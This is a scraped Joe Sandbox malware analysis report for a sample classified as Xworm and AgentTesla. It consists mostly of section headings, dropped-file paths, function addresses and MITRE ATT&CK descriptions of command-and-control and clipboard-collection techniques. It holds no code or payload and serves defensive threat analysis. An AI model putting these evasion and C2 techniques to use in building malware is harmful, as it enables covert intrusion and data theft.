Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DJ5PhUwOsM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Agenttesla

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
DJ5PhUwOsM.exe

Function 00401000 Relevance: 22.6, APIs: 15, Instructions: 119
fileCOMMON

Function 00401190 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 064F3100 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Function 00E73E80 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Function 064F7DF0 Relevance: 3.0, Strings: 2, Instructions: 490
COMMON

Function 00E7E270 Relevance: 2.8, Strings: 2, Instructions: 340
COMMON

Function 00E74A98 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Function 064FAD48 Relevance: 10.4, Strings: 8, Instructions: 400
COMMON

Function 064F91C0 Relevance: 5.2, Strings: 4, Instructions: 231
COMMON

Function 064FCFB8 Relevance: 4.6, Strings: 3, Instructions: 807
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre